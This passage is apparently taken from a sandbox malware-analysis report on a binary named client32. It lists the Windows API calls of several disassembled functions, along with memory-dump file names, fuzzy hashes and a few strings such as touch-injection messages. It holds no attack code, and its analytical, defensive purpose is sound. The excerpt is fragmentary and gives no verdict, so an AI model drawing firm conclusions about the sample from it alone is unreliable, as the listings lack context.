                                                                              • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                              • _memset.LIBCMT ref: 1114515E
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                              • CreatePopupMenu.USER32 ref: 111451AA
                                                                              • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                              • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                              • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 74472576-4108050209
                                                                              • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                              • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                              • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                              • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                              Function 11039710 Relevance: 13.6, APIs: 9, Instructions: 132windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 11039768
                                                                              • GetDlgItem.USER32(00000000,00000001), ref: 11039771
                                                                              • IsWindowEnabled.USER32(00000000), ref: 11039778
                                                                              • PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
                                                                              • GetParent.USER32(?), ref: 110397B6
                                                                              • GetWindowRect.USER32(?,?), ref: 110397C3
                                                                              • IntersectRect.USER32(?,?,?), ref: 110397FC
                                                                              • GetWindowRect.USER32(00000000,?), ref: 11039836
                                                                              • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
                                                                              • String ID:
                                                                              • API String ID: 818519836-0
                                                                              • Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                              • Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
                                                                              • Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                              • Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
                                                                              Function 11153730 Relevance: 13.6, APIs: 9, Instructions: 128windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 11153763
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                              • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                              • SelectObject.GDI32(00000000,?), ref: 111538C1
                                                                              • SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
                                                                              • DeleteDC.GDI32(00000000), ref: 111538D8
                                                                              • ReleaseDC.USER32(00000000,?), ref: 111538E7
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                              • String ID:
                                                                              • API String ID: 602542589-0
                                                                              • Opcode ID: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                              • Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
                                                                              • Opcode Fuzzy Hash: 0628f4ae7de687692ce3acf881be40c904e5404e254904012615511724b7f5fd
                                                                              • Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
                                                                              Function 110CD940 Relevance: 13.6, APIs: 9, Instructions: 89windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,75A73760,00000000,111F1590,?,110CD955,00000000,75A73760), ref: 111103E8
                                                                                • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,75A8A1D0,00000000,?,110CD955,00000000,75A73760), ref: 11110408
                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,75A73760,00000000,75A8A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                              • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                              • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                              • IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
                                                                              • DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 1497311044-0
                                                                              • Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                              • Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
                                                                              • Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                              • Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
                                                                              Function 11113570 Relevance: 13.6, APIs: 9, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStockObject.GDI32(00000003), ref: 111135A7
                                                                              • FillRect.USER32(?,?,00000000), ref: 111135C4
                                                                              • FillRect.USER32(?,?,00000000), ref: 111135D2
                                                                              • SetROP2.GDI32(?,00000007), ref: 111135FE
                                                                              • SetBkMode.GDI32(?,?), ref: 1111360A
                                                                              • SetBkColor.GDI32(?,?), ref: 11113615
                                                                              • SetTextColor.GDI32(?,?), ref: 11113620
                                                                              • SetTextJustification.GDI32(?,?,?), ref: 11113631
                                                                              • SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                              • String ID:
                                                                              • API String ID: 1094208222-0
                                                                              • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                              • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                              • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                              • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                              Function 1100D4C0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                              • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                              • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                              • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                              • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                              • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                              • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                              • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                              • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID:
                                                                              • API String ID: 190572456-0
                                                                              • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                              • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                              • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                              • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                              Function 1109D980 Relevance: 13.6, APIs: 9, Instructions: 63fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D98F
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9A9
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9B6
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9C3
                                                                              • SetEvent.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9D5
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9DF
                                                                              • SetEvent.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9F1
                                                                              • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9FB
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109DA08
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$Event$FileUnmapView
                                                                              • String ID:
                                                                              • API String ID: 2427653990-0
                                                                              • Opcode ID: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                              • Instruction ID: ef7400aadcbdc77f3d4b8b656ca31cdf014edcd8fc82e503e85a70b1789423f5
                                                                              • Opcode Fuzzy Hash: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                              • Instruction Fuzzy Hash: 7B11ECB1A407489BD730EFAAC9D481AFBF9AF583043514D7EE19AC3A10C634E8489B50
                                                                              Function 11043240 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 244COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • _memset.LIBCMT ref: 110433A9
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem$__wcstoi64_memset
                                                                              • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                              • API String ID: 3760389471-710950153
                                                                              • Opcode ID: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                              • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                              • Opcode Fuzzy Hash: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                              • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                              Function 1101F4D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 199COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
                                                                              • GetBkColor.GDI32(?), ref: 1101F5BE
                                                                              • GetTextColor.GDI32(?), ref: 1101F645
                                                                                • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
                                                                                • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
                                                                                • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
                                                                                • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
                                                                                • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
                                                                                • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
                                                                                • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
                                                                              • String ID: VUUU$VUUU
                                                                              • API String ID: 179481525-3149182767
                                                                              • Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                              • Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
                                                                              • Opcode Fuzzy Hash: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                              • Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94
                                                                              Function 1103B420 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1103B476
                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
